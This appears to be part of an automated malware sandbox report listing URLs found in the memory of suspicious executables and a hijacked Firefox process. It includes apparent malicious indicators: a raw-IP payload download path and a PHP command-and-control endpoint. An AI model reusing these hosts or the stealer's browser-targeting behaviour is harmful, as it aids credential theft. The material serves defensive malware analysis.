Source: 58ce8f976c.exe, 0000000A.00000003.3094128687.0000000000F9F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/off/def.exeee
Source: 58ce8f976c.exe, 0000000A.00000003.3094128687.0000000000F9F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/off/def.exeeg
Source: 7451ae0b11.exe, 0000000B.00000002.3004186690.0000000000F6E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206
Source: 7451ae0b11.exe, 0000000B.00000002.3004186690.0000000000FC6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/6c4adf523b719729.php
Source: 7451ae0b11.exe, 0000000B.00000002.3004186690.0000000000FC6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/6c4adf523b719729.php-
Source: 7451ae0b11.exe, 0000000B.00000002.3004186690.0000000000FC6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/6c4adf523b719729.php//
Source: 7451ae0b11.exe, 0000000B.00000002.3004186690.0000000000FB2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/6c4adf523b719729.php2
Source: 7451ae0b11.exe, 0000000B.00000002.3004186690.0000000000FC6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/6c4adf523b719729.php9
Source: 7451ae0b11.exe, 0000000B.00000002.3004186690.0000000000FC6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/6c4adf523b719729.phpg
Source: 7451ae0b11.exe, 0000000B.00000002.3004186690.0000000000FC6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/9
Source: 7451ae0b11.exe, 0000000B.00000002.3004186690.0000000000FC6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/K
Source: file.exe, 00000000.00000003.2197608376.0000000005E1D000.00000004.00000800.00020000.00000000.sdmp, 58ce8f976c.exe, 0000000A.00000003.2924958983.0000000005A4D000.00000004.00000800.00020000.00000000.sdmp, 58ce8f976c.exe, 0000000C.00000003.3087303221.0000000006013000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3269450087.0000019E4C366000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: file.exe, 00000000.00000003.2197608376.0000000005E1D000.00000004.00000800.00020000.00000000.sdmp, 58ce8f976c.exe, 0000000A.00000003.2924958983.0000000005A4D000.00000004.00000800.00020000.00000000.sdmp, 58ce8f976c.exe, 0000000C.00000003.3087303221.0000000006013000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3269450087.0000019E4C366000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: firefox.exe, 0000001A.00000002.3239630691.0000019E4954E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://compose.mail.yahoo.co.jp/ym/Compose?To=%ss
Source: 58ce8f976c.exe, 0000000A.00000003.2911175052.0000000000F3E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.microx
Source: file.exe, 00000000.00000003.2197608376.0000000005E1D000.00000004.00000800.00020000.00000000.sdmp, 58ce8f976c.exe, 0000000A.00000003.2924958983.0000000005A4D000.00000004.00000800.00020000.00000000.sdmp, 58ce8f976c.exe, 0000000C.00000003.3087303221.0000000006013000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3269450087.0000019E4C366000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: file.exe, 00000000.00000003.2197608376.0000000005E1D000.00000004.00000800.00020000.00000000.sdmp, 58ce8f976c.exe, 0000000A.00000003.2924958983.0000000005A4D000.00000004.00000800.00020000.00000000.sdmp, 58ce8f976c.exe, 0000000C.00000003.3087303221.0000000006013000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3269450087.0000019E4C366000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: file.exe, 00000000.00000003.2197608376.0000000005E1D000.00000004.00000800.00020000.00000000.sdmp, 58ce8f976c.exe, 0000000A.00000003.2924958983.0000000005A4D000.00000004.00000800.00020000.00000000.sdmp, 58ce8f976c.exe, 0000000C.00000003.3087303221.0000000006013000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3269450087.0000019E4C366000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: file.exe, 00000000.00000003.2197608376.0000000005E1D000.00000004.00000800.00020000.00000000.sdmp, 58ce8f976c.exe, 0000000A.00000003.2924958983.0000000005A4D000.00000004.00000800.00020000.00000000.sdmp, 58ce8f976c.exe, 0000000C.00000003.3087303221.0000000006013000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3269450087.0000019E4C366000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: file.exe, 00000000.00000003.2197608376.0000000005E1D000.00000004.00000800.00020000.00000000.sdmp, 58ce8f976c.exe, 0000000A.00000003.2924958983.0000000005A4D000.00000004.00000800.00020000.00000000.sdmp, 58ce8f976c.exe, 0000000C.00000003.3087303221.0000000006013000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3269450087.0000019E4C366000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: firefox.exe, 0000001A.00000003.3165170400.0000019E4E0ED000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://detectportal.firefox.com
Source: firefox.exe, 0000001A.00000002.3237977598.0000019E49010000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.3264016612.0000019E4C115000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://detectportal.firefox.com/canonical.html
Source: firefox.exe, 0000001A.00000002.3264016612.0000019E4C115000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://detectportal.firefox.com/canonical.htmlSEC_REQUIRE_SAME_ORIGIN_DATA_IS_BLOCKEDACTIVITY_SUBTYP
Source: firefox.exe, 0000001A.00000003.3147296630.0000019E53C6A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://detectportal.firefox.com/success.txt?ipv4
Source: firefox.exe, 0000001A.00000003.3147296630.0000019E53C6A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://detectportal.firefox.com/success.txt?ipv6
Source: firefox.exe, 0000001A.00000002.3266603908.0000019E4C266000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285958832.0000019E4DA03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285958832.0000019E4DA19000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://developer.mozilla.org/en/docs/DOM:element.addEventListener
Source: firefox.exe, 0000001A.00000002.3273423332.0000019E4C980000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: http://developer.mozilla.org/en/docs/DOM:element.addEventListenerFailed
Source: firefox.exe, 0000001A.00000002.3266603908.0000019E4C266000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285958832.0000019E4DA03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285958832.0000019E4DA19000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://developer.mozilla.org/en/docs/DOM:element.removeEventListener
Source: firefox.exe, 0000001A.00000002.3273423332.0000019E4C980000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: http://developer.mozilla.org/en/docs/DOM:element.removeEventListenerThe
Source: firefox.exe, 0000001A.00000002.3227788063.0000019E47026000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://exslt.org/common
Source: firefox.exe, 0000001A.00000002.3227788063.0000019E47026000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://exslt.org/math
Source: firefox.exe, 0000001A.00000002.3227788063.0000019E47026000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://exslt.org/sets
Source: firefox.exe, 0000001A.00000002.3224109770.0000019E3B803000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://exslt.org/strings
Source: firefox.exe, 0000001A.00000002.3232273931.0000019E47F00000.00000002.00000001.00040000.0000001C.sdmp String found in binary or memory: http://fb.me/use-check-prop-types
Source: firefox.exe, 0000001A.00000002.3232273931.0000019E47F00000.00000002.00000001.00040000.0000001C.sdmp String found in binary or memory: http://fb.me/use-check-prop-typesG
Source: firefox.exe, 0000001A.00000003.3092408518.0000019E4CA56000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.3169464737.0000019E4DEB7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.3135984680.0000019E53E83000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3234086295.0000019E48C20000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3274206743.0000019E4CA4C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.3169464737.0000019E4DE7F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3257880743.0000019E4BF80000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.3145273274.0000019E53D93000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3288686751.0000019E4DE4B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285958832.0000019E4DA33000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.3093671509.0000019E49EDE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.3165170400.0000019E4E025000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3245252425.0000019E49ECF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.3119455546.0000019E557B0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3250265468.0000019E4B803000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.3200289786.0000019E53E84000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.3092945817.0000019E4BDF9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.3142796839.0000019E53E85000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3254465653.0000019E4BCA5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.3092945817.0000019E4BDF3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3255417100.0000019E4BDB1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/MPL/2.0/.
Source: file.exe, 00000000.00000003.2197608376.0000000005E1D000.00000004.00000800.00020000.00000000.sdmp, 58ce8f976c.exe, 0000000A.00000003.2924958983.0000000005A4D000.00000004.00000800.00020000.00000000.sdmp, 58ce8f976c.exe, 0000000C.00000003.3087303221.0000000006013000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3269450087.0000019E4C366000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0
Source: file.exe, 00000000.00000003.2197608376.0000000005E1D000.00000004.00000800.00020000.00000000.sdmp, 58ce8f976c.exe, 0000000A.00000003.2924958983.0000000005A4D000.00000004.00000800.00020000.00000000.sdmp, 58ce8f976c.exe, 0000000C.00000003.3087303221.0000000006013000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3269450087.0000019E4C366000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: firefox.exe, 0000001A.00000002.3239630691.0000019E4954E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://poczta.interia.pl/mh/?mailto=%sw
Source: firefox.exe, 0000001A.00000003.3148359277.0000019E53BC0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://r3.i.lencr.org/0W
Source: firefox.exe, 0000001A.00000003.3148359277.0000019E53BC0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://r3.o.lencr.org0
Source: firefox.exe, 0000001A.00000002.3232273931.0000019E47F00000.00000002.00000001.00040000.0000001C.sdmp String found in binary or memory: http://stackoverflow.com/questions/30030031)
Source: firefox.exe, 0000001A.00000002.3239630691.0000019E4954E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://win.mail.ru/cgi-bin/sentmsg?mailto=%sy
Source: firefox.exe, 0000001A.00000002.3239630691.0000019E4954E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.inbox.lv/rfc2368/?value=%su
Source: firefox.exe, 0000001A.00000002.3264016612.0000019E4C115000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/2005/app-update
Source: firefox.exe, 0000001A.00000002.3264016612.0000019E4C115000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/2005/app-updateONLY_INSTANCE_CHECK_DEFAULT_POLL_INTERVAL_MSBITS_IDLE_NO_PROGR
Source: firefox.exe, 0000001A.00000002.3257146200.0000019E4BE6C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3257146200.0000019E4BE19000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3286844037.0000019E4DCE3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3227788063.0000019E47051000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3264016612.0000019E4C115000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul
Source: firefox.exe, 0000001A.00000002.3232516855.0000019E48100000.00000002.00000001.00040000.0000001D.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul(
Source: firefox.exe, 0000001A.00000002.3231295540.0000019E47EDF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul:
Source: firefox.exe, 0000001A.00000002.3264016612.0000019E4C115000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulExpected
Source: firefox.exe, 0000001A.00000002.3232516855.0000019E48100000.00000002.00000001.00040000.0000001D.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulR
Source: firefox.exe, 0000001A.00000002.3231295540.0000019E47EDF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulhttp://www.mozilla.org/keymaster/gateke
Source: firefox.exe, 0000001A.00000002.3231295540.0000019E47EDF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xuloncommand=closebuttoncommand
Source: firefox.exe, 0000001A.00000002.3231295540.0000019E47EAF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulopenPreferences/internalPrefCategoryNam
Source: firefox.exe, 0000001A.00000002.3231295540.0000019E47EDF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulresource:///modules/sessionstore/Sessio
Source: file.exe, 00000000.00000003.2197608376.0000000005E1D000.00000004.00000800.00020000.00000000.sdmp, 58ce8f976c.exe, 0000000A.00000003.2924958983.0000000005A4D000.00000004.00000800.00020000.00000000.sdmp, 58ce8f976c.exe, 0000000C.00000003.3087303221.0000000006013000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3269450087.0000019E4C366000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.3148359277.0000019E53BC0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://x1.c.lencr.org/0
Source: file.exe, 00000000.00000003.2197608376.0000000005E1D000.00000004.00000800.00020000.00000000.sdmp, 58ce8f976c.exe, 0000000A.00000003.2924958983.0000000005A4D000.00000004.00000800.00020000.00000000.sdmp, 58ce8f976c.exe, 0000000C.00000003.3087303221.0000000006013000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3269450087.0000019E4C366000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.3148359277.0000019E53BC0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://x1.i.lencr.org/0
Source: firefox.exe, 0000001A.00000002.3237977598.0000019E49010000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://%LOCALE%.malware-error.mozilla.com/?url=
Source: firefox.exe, 0000001A.00000002.3237977598.0000019E49010000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://%LOCALE%.phish-error.mozilla.com/?url=
Source: firefox.exe, 0000001A.00000002.3237977598.0000019E49010000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://%LOCALE%.phish-report.mozilla.com/?url=
Source: firefox.exe, 0000001A.00000003.3086228555.0000019E4B852000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.3084909437.0000019E4B600000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.3085359079.0000019E4B80F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ac.duckduckgo.com/ac/
Source: file.exe, 00000000.00000003.2174370045.0000000005C1B000.00000004.00000800.00020000.00000000.sdmp, 58ce8f976c.exe, 0000000A.00000003.2896261286.0000000005958000.00000004.00000800.00020000.00000000.sdmp, 58ce8f976c.exe, 0000000A.00000003.2896136861.000000000596F000.00000004.00000800.00020000.00000000.sdmp, 58ce8f976c.exe, 0000000C.00000003.3051709799.000000000601B000.00000004.00000800.00020000.00000000.sdmp, 58ce8f976c.exe, 0000000C.00000003.3056682924.000000000601B000.00000004.00000800.00020000.00000000.sdmp, 58ce8f976c.exe, 0000000C.00000003.3051343446.000000000601D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: firefox.exe, 0000001A.00000002.3231295540.0000019E47EDF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3239630691.0000019E4954E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3237977598.0000019E49010000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.3232273931.0000019E47F00000.00000002.00000001.00040000.0000001C.sdmp, firefox.exe, 0000001A.00000002.3234086295.0000019E48C79000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.firefox.com/
Source: firefox.exe, 0000001A.00000002.3237977598.0000019E49010000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://accounts.firefox.com/settings/clients
Source: firefox.exe, 0000001A.00000003.3147296630.0000019E53C6A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.firefox.comK
Source: firefox.exe, 0000001A.00000002.3214593137.00000045EEBD8000.00000004.00000010.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3276626657.0000019E4CD44000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/v3/signin/challenge/pwd
Source: firefox.exe, 0000001A.00000002.3223563743.0000019E3B669000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/v3/signin/challenge/pwd--no-default-browser-check--disable-popup-blockin
Source: firefox.exe, 0000001A.00000002.3224109770.0000019E3B803000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3232516855.0000019E48100000.00000002.00000001.00040000.0000001D.sdmp String found in binary or memory: https://addons.mozilla.org
Source: firefox.exe, 0000001A.00000002.3237977598.0000019E49010000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/%LOCALE%/%APP%/blocked-addon/%addonID%/%addonVersion%/
Source: firefox.exe, 0000001A.00000002.3237977598.0000019E49010000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/
Source: firefox.exe, 0000001A.00000002.3237977598.0000019E49010000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/language-tools/
Source: firefox.exe, 0000001A.00000002.3237977598.0000019E49010000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/search-users/
Source: firefox.exe, 0000001A.00000002.3237977598.0000019E49010000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/search?q=%TERMS%&platform=%OS%&appver=%VERSION%
Source: firefox.exe, 0000001A.00000002.3237977598.0000019E49010000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/themes
Source: firefox.exe, 0000001A.00000002.3281903988.0000019E4D084000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3264016612.0000019E4C115000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/en-US/firefox/collections/4757633/25c2b44583534b3fa8fea977c419cd/?page=1&
Source: firefox.exe, 0000001A.00000002.3281903988.0000019E4D084000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/firefox/downloads/file/4040738/cookie_autodelete-3.8.2.xpi
Source: firefox.exe, 0000001A.00000002.3281903988.0000019E4D084000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/firefox/downloads/file/4128570/languagetool-7.1.13.xpi
Source: firefox.exe, 0000001A.00000002.3281903988.0000019E4D084000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/firefox/downloads/file/4129240/privacy_badger17-2023.6.23.xpi
Source: firefox.exe, 0000001A.00000002.3281903988.0000019E4D084000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/firefox/downloads/file/4134489/enhancer_for_youtube-2.0.119.1.xpi
Source: firefox.exe, 0000001A.00000002.3281903988.0000019E4D084000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/firefox/downloads/file/4141092/facebook_container-2.3.11.xpi
Source: firefox.exe, 0000001A.00000002.3281903988.0000019E4D084000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/user-media/addon_icons/506/506646-64.png?modified=mcrushed
Source: firefox.exe, 0000001A.00000002.3281903988.0000019E4D084000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/user-media/addon_icons/700/700308-64.png?modified=4bc8e79f
Source: firefox.exe, 0000001A.00000002.3281903988.0000019E4D084000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/user-media/addon_icons/708/708770-64.png?modified=4f881970
Source: firefox.exe, 0000001A.00000002.3281903988.0000019E4D084000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/user-media/addon_icons/784/784287-64.png?modified=mcrushed
Source: firefox.exe, 0000001A.00000002.3281903988.0000019E4D084000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/user-media/addon_icons/954/954390-64.png?modified=97d4c956
Source: firefox.exe, 0000001A.00000002.3264016612.0000019E4C108000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ads.stickyadstv.com/firefox-etp
Source: firefox.exe, 0000001A.00000002.3239630691.0000019E4954E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3234086295.0000019E48C79000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3232516855.0000019E48100000.00000002.00000001.00040000.0000001D.sdmp String found in binary or memory: https://amazon.com
Source: firefox.exe, 0000001A.00000002.3237977598.0000019E49010000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://api.accounts.firefox.com/v1
Source: firefox.exe, 0000001A.00000002.3237977598.0000019E49010000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://apps.apple.com/app/firefox-private-safe-browser/id989804926
Source: firefox.exe, 0000001A.00000002.3237977598.0000019E49010000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://apps.apple.com/us/app/firefox-private-network-vpn/id1489407738
Source: firefox.exe, 0000001A.00000002.3260229875.0000019E4C00E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aus5.mozilla.org
Source: firefox.exe, 0000001A.00000002.3260229875.0000019E4C055000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aus5.mozilla.org/
Source: firefox.exe, 0000001A.00000002.3237977598.0000019E49010000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://aus5.mozilla.org/update/3/GMP/%VERSION%/%BUILD_ID%/%BUILD_TARGET%/%LOCALE%/%CHANNEL%/%OS_VER
Source: firefox.exe, 0000001A.00000002.3237977598.0000019E49010000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://aus5.mozilla.org/update/3/SystemAddons/%VERSION%/%BUILD_ID%/%BUILD_TARGET%/%LOCALE%/%CHANNEL
Source: firefox.exe, 0000001A.00000002.3224109770.0000019E3B811000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aus5.mozilla.org/update/6/%PRODUCT%/%VERSION%/%BUILD_ID%/%BUILD_TARGET%/%LOCALE%/%CHANNEL%/%
Source: firefox.exe, 0000001A.00000002.3232516855.0000019E48100000.00000002.00000001.00040000.0000001D.sdmp String found in binary or memory: https://baidu.com
Source: firefox.exe, 0000001A.00000002.3232273931.0000019E47F00000.00000002.00000001.00040000.0000001C.sdmp String found in binary or memory: https://basket.mozilla.org/news/subscribe/
Source: firefox.exe, 0000001A.00000002.3232273931.0000019E47F00000.00000002.00000001.00040000.0000001C.sdmp String found in binary or memory: https://basket.mozilla.org/news/subscribe_sms/
Source: firefox.exe, 0000001A.00000002.3232273931.0000019E47F00000.00000002.00000001.00040000.0000001C.sdmp String found in binary or memory: https://basket.mozilla.org/subscribe.json
Source: firefox.exe, 0000001A.00000002.3237977598.0000019E49010000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://blocked.cdn.mozilla.net/
Source: firefox.exe, 0000001A.00000002.3237977598.0000019E49010000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://blocked.cdn.mozilla.net/%blockID%.html
Source: file.exe, 00000000.00000003.2199007383.0000000005BDA000.00000004.00000800.00020000.00000000.sdmp, 58ce8f976c.exe, 0000000A.00000003.2926473817.0000000000FCC000.00000004.00000020.00020000.00000000.sdmp, 58ce8f976c.exe, 0000000C.00000003.3090013500.0000000005FD9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3239630691.0000019E4954E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3234086295.0000019E48C79000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696484494400800000.2&ci=1696484494189.
Source: file.exe, 00000000.00000003.2214880868.0000000005BD9000.00000004.00000800.00020000.00000000.sdmp, 58ce8f976c.exe, 0000000A.00000003.2926473817.0000000000FCC000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3239630691.0000019E4954E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3234086295.0000019E48C79000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1&ci=1696484494189.12791&cta
Source: firefox.exe, 0000001A.00000002.3285958832.0000019E4DA59000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3247984693.0000019E4B65C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mo
Source: firefox.exe, 0000001A.00000002.3231295540.0000019E47EAF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3232516855.0000019E48100000.00000002.00000001.00040000.0000001D.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1238180
Source: firefox.exe, 0000001A.00000002.3231295540.0000019E47EAF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1238180toolbar-context-menu-bookmarks-show-other-bookma
Source: file.exe, 00000000.00000003.2174370045.0000000005C1B000.00000004.00000800.00020000.00000000.sdmp, 58ce8f976c.exe, 0000000A.00000003.2896261286.0000000005958000.00000004.00000800.00020000.00000000.sdmp, 58ce8f976c.exe, 0000000A.00000003.2896136861.000000000596F000.00000004.00000800.00020000.00000000.sdmp, 58ce8f976c.exe, 0000000C.00000003.3051709799.000000000601B000.00000004.00000800.00020000.00000000.sdmp, 58ce8f976c.exe, 0000000C.00000003.3056682924.000000000601B000.00000004.00000800.00020000.00000000.sdmp, 58ce8f976c.exe, 0000000C.00000003.3051343446.000000000601D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
